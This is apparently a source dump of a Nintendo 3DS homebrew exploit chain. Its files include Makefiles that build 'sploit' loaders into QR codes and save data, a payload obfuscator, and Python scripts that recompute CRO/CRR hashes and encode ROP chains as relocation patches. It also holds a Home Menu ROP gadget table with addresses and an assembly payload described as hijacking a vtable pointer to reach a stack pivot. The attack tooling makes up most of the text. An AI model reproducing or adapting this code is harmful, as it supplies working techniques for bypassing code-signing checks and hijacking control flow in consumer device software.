14 | ("MENU_NSS_HANDLE", "0x32e040"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/scripts/fixCRRpatch.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import sys
 3 | import hashlib
 4 | sys.path.append(os.path.abspath(os.path.dirname(os.path.abspath(__file__))+"/../build/"))
 5 | from constants import *
 6 |  
 7 | def getWord(b, k, n=4):
 8 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
 9 | 
10 | def getHash(b, k, n):
11 | 	return bytearray(hashlib.sha256(crodata[(k):(k+n)]).digest())
12 | 
13 | crofn=sys.argv[1]
14 | crrpatchfn=sys.argv[2]
15 | 
16 | crodata=bytearray(open(crofn,"rb").read())
17 | crrdata=bytearray(b'\x00'*0x20*CRR_HASHES)
18 | hash=getHash(crodata,0x00,0x80)
19 | for i in range(0,0x20*CRR_HASHES,0x20):
20 | 	crrdata[i:(i+0x20)]=hash
21 | open(crrpatchfn,"wb").write(crrdata)
22 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | SCRIPTS = "../scripts"
14 | 
15 | all: cn_qr_initial_loader.bin.png
16 | 
17 | clean:
18 | 	@rm -f cn_qr_initial_loader.bin.png
19 | 	@cd WEST && make clean
20 | 	@cd JPN && make clean
21 | 	@echo "all cleaned up !"
22 | 
23 | cn_qr_initial_loader.bin.png:
24 | 	@cd $(CNVERSION) && make
25 | 	@cp $(CNVERSION)/$@ ./
26 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | SCRIPTS = "../scripts"
14 | 
15 | all: cn_save_initial_loader.bin
16 | 
17 | clean:
18 | 	@rm -f cn_save_initial_loader.bin
19 | 	@cd WEST && make clean
20 | 	@cd JPN && make clean
21 | 	@echo "all cleaned up !"
22 | 
23 | cn_save_initial_loader.bin:
24 | 	@cd $(CNVERSION) && make
25 | 	@cp $(CNVERSION)/$@ ./
26 | 	@python $(SCRIPTS)/obfuscator5000.py $@
27 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | SCRIPTS = "../../scripts"
14 | NAME = cn_save_initial_loader
15 | 
16 | .PHONY: all cn_initial/cn_initial.bin
17 | 
18 | all: $(NAME).bin
19 | 
20 | clean:
21 | 	@cd cn_initial && make clean
22 | 	@rm -f $(NAME).bin $(NAME).bin.png
23 | 	@echo "all cleaned up !"
24 | 
25 | -include $(DFILES)
26 | 
27 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin
28 | 	@armips sploit.s
29 | 	@python $(SCRIPTS)/obfuscator5000.py $<
30 | 
31 | cn_initial/cn_initial.bin:
32 | 	$(MAKE) -C cn_initial
33 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | SCRIPTS = "../../scripts"
14 | NAME = cn_save_initial_loader
15 | 
16 | .PHONY: all cn_initial/cn_initial.bin
17 | 
18 | all: $(NAME).bin
19 | 
20 | clean:
21 | 	@cd cn_initial && make clean
22 | 	@rm -f $(NAME).bin $(NAME).bin.png
23 | 	@echo "all cleaned up !"
24 | 
25 | -include $(DFILES)
26 | 
27 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin
28 | 	@armips sploit.s
29 | 	@python $(SCRIPTS)/obfuscator5000.py $<
30 | 
31 | cn_initial/cn_initial.bin:
32 | 	$(MAKE) -C cn_initial
33 | 


--------------------------------------------------------------------------------
/scripts/fixCRO.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import hashlib
 3 |  
 4 | def getWord(b, k, n=4):
 5 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
 6 | 
 7 | def getHash(b, k, n):
 8 | 	return bytearray(hashlib.sha256(crodata[(k):(k+n)]).digest())
 9 | 
10 | crofn=sys.argv[1]
11 | # crrfn=sys.argv[2]
12 | 
13 | crodata=bytearray(open(crofn,"rb").read())
14 | 
15 | # print([hex(v) for v in getHash(crodata,getWord(crodata, 0xB0),getWord(crodata, 0xB4))])
16 | 
17 | crodata[0x00:0x20]=getHash(crodata,0x80,getWord(crodata, 0xB0)-0x80)
18 | crodata[0x20:0x40]=getHash(crodata,getWord(crodata, 0xB0),getWord(crodata, 0xB4))
19 | crodata[0x40:0x60]=getHash(crodata,getWord(crodata, 0xB0)+getWord(crodata, 0xB4),getWord(crodata, 0xB8)-(getWord(crodata, 0xB0)+getWord(crodata, 0xB4)))
20 | 
21 | # crrdata=bytearray(open(crrfn,"rb").read())
22 | # crrdata[0x360:0x380]=getHash(crodata,0x00,0x80)
23 | 
24 | open(crofn,"wb").write(crodata)
25 | # open(crrfn,"wb").write(crrdata)
26 | 


--------------------------------------------------------------------------------
/scripts/makePatches.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | sys.path.append(os.path.abspath(os.path.dirname(os.path.abspath(__file__))+"/../build/"))
 4 | from constants import *
 5 | 
 6 | os.system("python "+sys.argv[1]+"/extractPatch.py oss_cro/oss.cro oss_cro/out_oss.cro build/cro/patch0.bin "+str(CRO_PATCH0_OFFSET)+" 0x60 full")
 7 | os.system("python "+sys.argv[1]+"/extractPatch.py oss_cro/oss.cro oss_cro/out_oss.cro build/cro/patch1.bin "+str(CRO_PATCH1_OFFSET)+" "+str(CRO_PATCH2_OFFSET))
 8 | os.system("python "+sys.argv[1]+"/extractPatch.py oss_cro/oss.cro oss_cro/out_oss.cro build/cro/patch2.bin "+str(CRO_PATCH2_OFFSET)+" "+str(CRO_PATCH3_OFFSET))
 9 | os.system("python "+sys.argv[1]+"/extractPatch.py oss_cro/oss.cro oss_cro/out_oss.cro build/cro/patch3.bin "+str(CRO_PATCH3_OFFSET)+" "+str(CRO_PATCH4_OFFSET))
10 | os.system("python "+sys.argv[1]+"/extractPatch.py oss_cro/oss.cro oss_cro/out_oss.cro build/cro/patch4.bin "+str(CRO_PATCH4_OFFSET)+" "+str(CRO_SIZE))
11 | 


--------------------------------------------------------------------------------
/scripts/obfuscator5000.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import random
 3 | import struct
 4 | 
 5 | #crappy obfuscation, but doesn't really cost us anything
 6 | 
 7 | magicWord=0xDEADC0DE
 8 | 
 9 | def getWord(b, k, n=4):
10 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
11 | 
12 | def putWord(b, k, v):
13 | 	b[(k):(k+4)]=struct.pack("I",v)
14 | 
15 | #todo : remove doubles ?
16 | def findWords(d):
17 | 	l=[]
18 | 	for k in range(0,len(d)&~0x3,4):
19 | 		v=getWord(d,k)
20 | 		if v!=magicWord and v!=0x0 and (v>>28)!=0xE:
21 | 			l.append(v)
22 | 	return l
23 | 
24 | def obfuscate(d,l):
25 | 	for k in range(0,len(d)&~0x3,4):
26 | 		v=getWord(d,k)
27 | 		if v==magicWord:
28 | 			v=random.choice(l)
29 | 			putWord(d,k,v)
30 | 
31 | data=bytearray(open(sys.argv[1],"rb").read())
32 | 
33 | words=findWords(data)
34 | obfuscate(data,words)
35 | # print("OBFUSCATOR 5000 TEMPORARILY DISABLED")
36 | # print("DO NOT FORGET TO REENABLE")
37 | 
38 | open(sys.argv[1], "wb").write(data)
39 | 


--------------------------------------------------------------------------------
/scripts/buildAll.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | import itertools
 4 | 
 5 | # 0 : firm, 1 : cn, 2 : spider, 3 : ro
 6 | 
 7 | def isVersionPossible(v):
 8 | 	if v[0]=="PRE5":
 9 | 		return v[3]<=1024 and v[2]<=2050
10 | 	else:
11 | 		return v[3]>=2049
12 | 
13 | firmVersions=["POST5", "N3DS"]
14 | cnVersions=["WEST", "JPN"]
15 | spiderVersions=[4096]
16 | roVersions=[4096]
17 | menuVersions=[11272, 12288, 13330, 15360, 16404, 17415, 19456, "20480_usa"]
18 | 
19 | a=[firmVersions, cnVersions, spiderVersions, roVersions, menuVersions]
20 | 
21 | extraparams=""
22 | for arg in sys.argv:
23 | 	if(arg=="--enableloadropbin"):
24 | 		extraparams+=" LOADROPBIN=1"
25 | 	if(arg=="--enableotherapp"):
26 | 		extraparams+=" OTHERAPP=1"
27 | 
28 | cnt=0
29 | for v in (list(itertools.product(*a))):
30 | 	if isVersionPossible(v):
31 | 		os.system("make clean")	
32 | 		os.system("make FIRMVERSION="+str(v[0])+" CNVERSION="+str(v[1])+" SPIDERVERSION="+str(v[2])+" ROVERSION="+str(v[3])+" MENUVERSION="+str(v[4])+extraparams)
33 | print(cnt)
34 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/source/text.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | #include <ctr/types.h>
 5 | #include "text.h"
 6 | #include "font_bin.h"
 7 | 
 8 | #define CHAR_SIZE_X (8)
 9 | #define CHAR_SIZE_Y (8)
10 | 
11 | int _strlen(char* str);
12 | 
13 | void drawCharacter(u8* fb, char c, u16 x, u16 y)
14 | {
15 | 	if(c<32)return;
16 | 	c-=32;
17 | 	u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8];
18 | 	fb+=(x*240+y)*3;
19 | 	int i, j;
20 | 	for(i=0;i<CHAR_SIZE_X;i++)
21 | 	{
22 | 		u8 v=*(charData++);
23 | 		for(j=0;j<CHAR_SIZE_Y;j++)
24 | 		{
25 | 			if(v&1)fb[0]=fb[1]=fb[2]=0x00;
26 | 			else fb[0]=fb[1]=fb[2]=0xFF;
27 | 			fb+=3;
28 | 			v>>=1;
29 | 		}
30 | 		fb+=(240-CHAR_SIZE_Y)*3;
31 | 	}
32 | }
33 | 
34 | void drawString(u8* fb, char* str, u16 x, u16 y)
35 | {
36 | 	if(!str)return;
37 | 	y=232-y;
38 | 	int k;
39 | 	int dx=0, dy=0;
40 | 	for(k=0;k<_strlen(str);k++)
41 | 	{
42 | 		if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy);
43 | 		dx+=8;
44 | 		if(str[k]=='\n'){dx=0;dy-=8;}
45 | 	}
46 | }
47 | 


--------------------------------------------------------------------------------
/menu_payload/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | ROPBIN_FILENAME_SUFFIX	:=	
14 | 
15 | ifeq ($(FIRMVERSION),N3DS)
16 | 	ROPBIN_FILENAME_SUFFIX	:=	_new3ds.bin
17 | else
18 | 	ROPBIN_FILENAME_SUFFIX	:=	_old3ds.bin
19 | endif
20 | 
21 | ifneq ($(strip $(LOADROPBIN)),)
22 | 	ROPBIN_CMD	:=	menu_ropbin.bin
23 | endif
24 | 
25 | SCRIPTS = "../scripts"
26 | 
27 | all: menu_payload_regionfree.bin menu_payload_loadropbin.bin $(ROPBIN_CMD)
28 | 
29 | clean:
30 | 	@rm -f menu_payload_regionfree.bin menu_payload_loadropbin.bin menu_ropbin.bin
31 | 	@echo "all cleaned up !"
32 | 
33 | menu_ropbin.bin:
34 | 	cp menu_ropbin_$(MENUVERSION)$(ROPBIN_FILENAME_SUFFIX) menu_ropbin.bin
35 | 
36 | %.bin: %.s
37 | 	@armips $<
38 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | SCRIPTS = "../../scripts"
14 | NAME = cn_qr_initial_loader
15 | 
16 | .PHONY: all cn_initial/cn_initial.bin
17 | 
18 | all: $(NAME).bin.png
19 | 
20 | %.bin.png: %.bin
21 | 	@python $(SCRIPTS)/obfuscator5000.py $<
22 | 	@python $(SCRIPTS)/crypt.py $< $(SCRIPTS)
23 | 	@$(SCRIPTS)/qrcode.exe -8 -o $@ < tmp
24 | 	@rm tmp
25 | 
26 | clean:
27 | 	@cd cn_initial && make clean
28 | 	@rm -f $(NAME).bin $(NAME).bin.png
29 | 	@echo "all cleaned up !"
30 | 
31 | -include $(DFILES)
32 | 
33 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin
34 | 	armips sploit.s
35 | 
36 | cn_initial/cn_initial.bin:
37 | 	# probably a bad idea; dependencies won't work well i guess
38 | 	$(MAKE) -C cn_initial
39 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | SCRIPTS = "../../scripts"
14 | NAME = cn_qr_initial_loader
15 | 
16 | .PHONY: all cn_initial/cn_initial.bin
17 | 
18 | all: $(NAME).bin.png
19 | 
20 | %.bin.png: %.bin
21 | 	@python $(SCRIPTS)/obfuscator5000.py $<
22 | 	@python $(SCRIPTS)/crypt.py $< $(SCRIPTS)
23 | 	@$(SCRIPTS)/qrcode.exe -8 -o $@ < tmp
24 | 	@rm tmp
25 | 
26 | clean:
27 | 	@cd cn_initial && make clean
28 | 	@rm -f $(NAME).bin $(NAME).bin.png
29 | 	@echo "all cleaned up !"
30 | 
31 | -include $(DFILES)
32 | 
33 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin
34 | 	armips sploit.s
35 | 
36 | cn_initial/cn_initial.bin:
37 | 	# probably a bad idea; dependencies won't work well i guess
38 | 	$(MAKE) -C cn_initial
39 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/source/text.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | #include <ctr/types.h>
 5 | #include "text.h"
 6 | #include "font_bin.h"
 7 | 
 8 | #define CHAR_SIZE_X (8)
 9 | #define CHAR_SIZE_Y (8)
10 | 
11 | int _strlen(char* str);
12 | 
13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y)
14 | // {
15 | // 	if(c<32)return;
16 | // 	c-=32;
17 | // 	u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8];
18 | // 	fb+=(x*240+y)*3;
19 | // 	int i, j;
20 | // 	for(i=0;i<CHAR_SIZE_X;i++)
21 | // 	{
22 | // 		u8 v=*(charData++);
23 | // 		for(j=0;j<CHAR_SIZE_Y;j++)
24 | // 		{
25 | // 			if(v&1)fb[0]=fb[1]=fb[2]=0x00;
26 | // 			fb+=3;
27 | // 			v>>=1;
28 | // 		}
29 | // 		fb+=(240-CHAR_SIZE_Y)*3;
30 | // 	}
31 | // }
32 | 
33 | // void drawString(u8* fb, char* str, u16 x, u16 y)
34 | // {
35 | // 	if(!str)return;
36 | // 	y=232-y;
37 | // 	int k;
38 | // 	int dx=0, dy=0;
39 | // 	for(k=0;k<_strlen(str);k++)
40 | // 	{
41 | // 		if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy);
42 | // 		dx+=8;
43 | // 		if(str[k]=='\n'){dx=0;dy-=8;}
44 | // 	}
45 | // }
46 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/source/text.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | #include <ctr/types.h>
 5 | #include "text.h"
 6 | #include "font_bin.h"
 7 | 
 8 | #define CHAR_SIZE_X (8)
 9 | #define CHAR_SIZE_Y (8)
10 | 
11 | int _strlen(char* str);
12 | 
13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y)
14 | // {
15 | // 	if(c<32)return;
16 | // 	c-=32;
17 | // 	u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8];
18 | // 	fb+=(x*240+y)*3;
19 | // 	int i, j;
20 | // 	for(i=0;i<CHAR_SIZE_X;i++)
21 | // 	{
22 | // 		u8 v=*(charData++);
23 | // 		for(j=0;j<CHAR_SIZE_Y;j++)
24 | // 		{
25 | // 			if(v&1)fb[0]=fb[1]=fb[2]=0x00;
26 | // 			fb+=3;
27 | // 			v>>=1;
28 | // 		}
29 | // 		fb+=(240-CHAR_SIZE_Y)*3;
30 | // 	}
31 | // }
32 | 
33 | // void drawString(u8* fb, char* str, u16 x, u16 y)
34 | // {
35 | // 	if(!str)return;
36 | // 	y=232-y;
37 | // 	int k;
38 | // 	int dx=0, dy=0;
39 | // 	for(k=0;k<_strlen(str);k++)
40 | // 	{
41 | // 		if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy);
42 | // 		dx+=8;
43 | // 		if(str[k]=='\n'){dx=0;dy-=8;}
44 | // 	}
45 | // }
46 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/source/text.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | #include <ctr/types.h>
 5 | #include "text.h"
 6 | #include "font_bin.h"
 7 | 
 8 | #define CHAR_SIZE_X (8)
 9 | #define CHAR_SIZE_Y (8)
10 | 
11 | int _strlen(char* str);
12 | 
13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y)
14 | // {
15 | // 	if(c<32)return;
16 | // 	c-=32;
17 | // 	u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8];
18 | // 	fb+=(x*240+y)*3;
19 | // 	int i, j;
20 | // 	for(i=0;i<CHAR_SIZE_X;i++)
21 | // 	{
22 | // 		u8 v=*(charData++);
23 | // 		for(j=0;j<CHAR_SIZE_Y;j++)
24 | // 		{
25 | // 			if(v&1)fb[0]=fb[1]=fb[2]=0x00;
26 | // 			fb+=3;
27 | // 			v>>=1;
28 | // 		}
29 | // 		fb+=(240-CHAR_SIZE_Y)*3;
30 | // 	}
31 | // }
32 | 
33 | // void drawString(u8* fb, char* str, u16 x, u16 y)
34 | // {
35 | // 	if(!str)return;
36 | // 	y=232-y;
37 | // 	int k;
38 | // 	int dx=0, dy=0;
39 | // 	for(k=0;k<_strlen(str);k++)
40 | // 	{
41 | // 		if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy);
42 | // 		dx+=8;
43 | // 		if(str[k]=='\n'){dx=0;dy-=8;}
44 | // 	}
45 | // }
46 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/source/text.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | #include <ctr/types.h>
 5 | #include "text.h"
 6 | #include "font_bin.h"
 7 | 
 8 | #define CHAR_SIZE_X (8)
 9 | #define CHAR_SIZE_Y (8)
10 | 
11 | int _strlen(char* str);
12 | 
13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y)
14 | // {
15 | // 	if(c<32)return;
16 | // 	c-=32;
17 | // 	u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8];
18 | // 	fb+=(x*240+y)*3;
19 | // 	int i, j;
20 | // 	for(i=0;i<CHAR_SIZE_X;i++)
21 | // 	{
22 | // 		u8 v=*(charData++);
23 | // 		for(j=0;j<CHAR_SIZE_Y;j++)
24 | // 		{
25 | // 			if(v&1)fb[0]=fb[1]=fb[2]=0x00;
26 | // 			fb+=3;
27 | // 			v>>=1;
28 | // 		}
29 | // 		fb+=(240-CHAR_SIZE_Y)*3;
30 | // 	}
31 | // }
32 | 
33 | // void drawString(u8* fb, char* str, u16 x, u16 y)
34 | // {
35 | // 	if(!str)return;
36 | // 	y=232-y;
37 | // 	int k;
38 | // 	int dx=0, dy=0;
39 | // 	for(k=0;k<_strlen(str);k++)
40 | // 	{
41 | // 		if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy);
42 | // 		dx+=8;
43 | // 		if(str[k]=='\n'){dx=0;dy-=8;}
44 | // 	}
45 | // }
46 | 


--------------------------------------------------------------------------------
/menu_ropdb/17415_proto/ropdb.txt:
--------------------------------------------------------------------------------
 1 | # format : ("ROP_GADGET_NAME", addr, word_size)
 2 | # format : ("APP_CONSTANT_PTR", pattern_addr, pattern_word_size, value_words_offset)
 3 | [
 4 | 	# pop gadgets
 5 | 	("ROP_MENU_POP_PC", 0x0010201c, 0x1), # pop {pc}
 6 | 	("ROP_MENU_POP_R0PC", 0x00157818, 0x1), # pop {r0, pc}
 7 | 	("ROP_MENU_POP_R1PC", 0x00236efc, 0x1), # pop {r1, pc}
 8 | 	("ROP_MENU_POP_R2R3R4R5R6PC", 0x0015040c, 0x1), # pop {r2, r3, r4, r5, r6, pc}
 9 | 	("ROP_MENU_POP_R4R5PC", 0x0012ccb8, 0x1), # pop {r4, r5, pc}
10 | 
11 | 	# load gadgets
12 | 	("ROP_MENU_STACK_PIVOT", 0x00100fb8, 0x1), # ldmdavc r4, {r4, r5, r8, sl, fp, ip, sp, pc}
13 | 	("ROP_MENU_LDR_R0R0_POP_R4PC", 0x0011f5d0, 0x2), # ldr r0, [r0] ; pop {r4, pc}
14 | 
15 | 	# store gadgets
16 | 	("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", 0x001550fc, 0x2), # streq r5, [r2, #0x30] ; pop {r4, r5, r6, pc}
17 | 
18 | 	# arithmetic gadgets
19 | 	("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", 0x0011f148, 0x2), # and r0, r0, r4 ; pop {r4, r5, r6, r7, r8, pc}
20 | 
21 | 	# comparison gadgets
22 | 	("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", 0x0021e6cc, 0x4), # cmp r0, r1 ; mvnls r0, #0 ; movhi r0, #1 ; pop {r4, pc}
23 | 
24 | 	# functions
25 | 	("ROP_MENU_SLEEPTHREAD", 0x0012b044, 0x2), # svc 0xa, bx lr
26 | 	("ROP_MENU_NSS_REBOOT", 0x00137390, 0x4), # ends in "add sp, sp, #0xc ; ldmfd sp!, {r4,r5,pc}"
27 | 	("MENU_NSS_HANDLE", 0x00137390, 0x4, 0x15),
28 | ]
29 | 


--------------------------------------------------------------------------------
/scripts/makeROP.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | sys.path.append(os.path.abspath(os.path.dirname(os.path.abspath(__file__))+"/../build/"))
 4 | from constants import *
 5 | 
 6 | def getWord(b, k, n=4):
 7 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
 8 |  
 9 | def putWord(b, k, v, n=4):
10 | 	for c in range(n):
11 | 		b[k+c]=(v>>(c*8))&0xFF
12 | 
13 | def writeRelocationPatch(b, i, a, v, s=0x1):
14 | 	s+=CRO_SEGMENT_OFFSET
15 | 	k=CRO_PATCH4_OFFSET+i*0xC
16 | 	putWord(b, k+0x0, (a<<4)|s)
17 | 	putWord(b, k+0x4, 0x00000302)
18 | 	putWord(b, k+0x8, v-CRO_RELOCATION_OFFSET)
19 | 
20 | ropfn=sys.argv[1]
21 | crofn=sys.argv[2]
22 | outfn=sys.argv[3]
23 | 
24 | ropdata=bytearray(open(ropfn,"rb").read())
25 | crodata=bytearray(open(crofn,"rb").read())
26 | 
27 | #make segment2 just a bit larger so we can modify the segment table with relocation patches
28 | putWord(crodata, CRO_PATCH3_OFFSET, CRO_SEGMENT2_SIZE)
29 | 
30 | segmentLocation=getWord(crodata, CRO_PATCH3_OFFSET-0x4)
31 | 
32 | #patch to change segment1's address
33 | writeRelocationPatch(crodata, 0, (CRO_PATCH3_OFFSET-0x10)-segmentLocation, RO_ROP_START, 0x2)
34 | 
35 | #actual ROP
36 | i=1
37 | for k in range(0,len(ropdata)-4,4):
38 | 	v=getWord(ropdata,k+4)
39 | 	if v!=0xDEADBABE:
40 | 		writeRelocationPatch(crodata, i, k+RO_ROP_OFFSET, v)
41 | 		i+=1
42 | 
43 | #initial return address
44 | writeRelocationPatch(crodata, i, 0x00, getWord(ropdata,0))
45 | 
46 | open(outfn,"wb").write(crodata)
47 | 


--------------------------------------------------------------------------------
/scripts/makeHeaders.py:
--------------------------------------------------------------------------------
 1 | from datetime import datetime
 2 | import sys
 3 | import ast
 4 | 
 5 | def outputConstantsH(d):
 6 | 	out=""
 7 | 	out+=("#ifndef CONSTANTS_H")+"\n"
 8 | 	out+=("#define CONSTANTS_H")+"\n"
 9 | 	for k in d:
10 | 		out+=("	#define "+k[0]+" "+str(k[1]))+"\n"
11 | 	out+=("#endif")+"\n"
12 | 	return out
13 | 
14 | def outputConstantsS(d):
15 | 	out=""
16 | 	for k in d:
17 | 		out+=(k[0]+" equ ("+str(k[1])+")")+"\n"
18 | 	return out
19 | 
20 | def outputConstantsPY(d):
21 | 	out=""
22 | 	for k in d:
23 | 		out+=(k[0]+" = ("+str(k[1])+")")+"\n"
24 | 	return out
25 | 
26 | if len(sys.argv)<6:
27 | 	print("use : "+sys.argv[0]+" <firmver> <cnver> <spiderver> <rover> <menuver> <extensionless_output_name> <input_file1> <input_file2> ...")
28 | 	exit()
29 | 
30 | # l=[("_SPIDER_VERSION", sys.argv[3]),
31 | l=[("_RO_VERSION", sys.argv[4])]
32 | l+=[("FIRM_VERSION", "\""+sys.argv[1]+"\""),
33 | 	("CN_VERSION", "\""+sys.argv[2]+"\""),
34 | 	("SPIDER_VERSION", "\""+sys.argv[3]+"\""),
35 | 	("RO_VERSION", "\""+sys.argv[4]+"\""),
36 | 	("MENU_VERSION", "\""+sys.argv[5]+"\"")]
37 | l+=[("BUILDTIME", "\""+datetime.now().strftime("%Y-%m-%d %H:%M:%S")+"\"")]
38 | l+=[("HB_NUM_HANDLES", "16")]
39 | 
40 | for fn in sys.argv[7:]:
41 | 	s=open(fn,"r").read()
42 | 	if len(s)>0:
43 | 		l+=(ast.literal_eval(s))
44 | 
45 | open(sys.argv[6]+".h","w").write(outputConstantsH(l))
46 | open(sys.argv[6]+".s","w").write(outputConstantsS(l))
47 | open(sys.argv[6]+".py","w").write(outputConstantsPY(l))
48 | 


--------------------------------------------------------------------------------
/menu_payload/menu_payload_loadropbin.s:
--------------------------------------------------------------------------------
 1 | .nds
 2 | 
 3 | .include "../build/constants.s"
 4 | 
 5 | .create "menu_payload_loadropbin.bin",0x0
 6 | 
 7 | MENU_OBJECT_LOC equ 0xBABE0000 ; for relocation
 8 | 
 9 | ; basically we overwrite an object's data to get home menu to do what we want
10 | ; first we overwrite the vtable pointer so that we can get the code to jump to where we want
11 | ; the method we use for that is located at vtable + 0x8
12 | ; with that we can put a in our vtable to our stack pivot
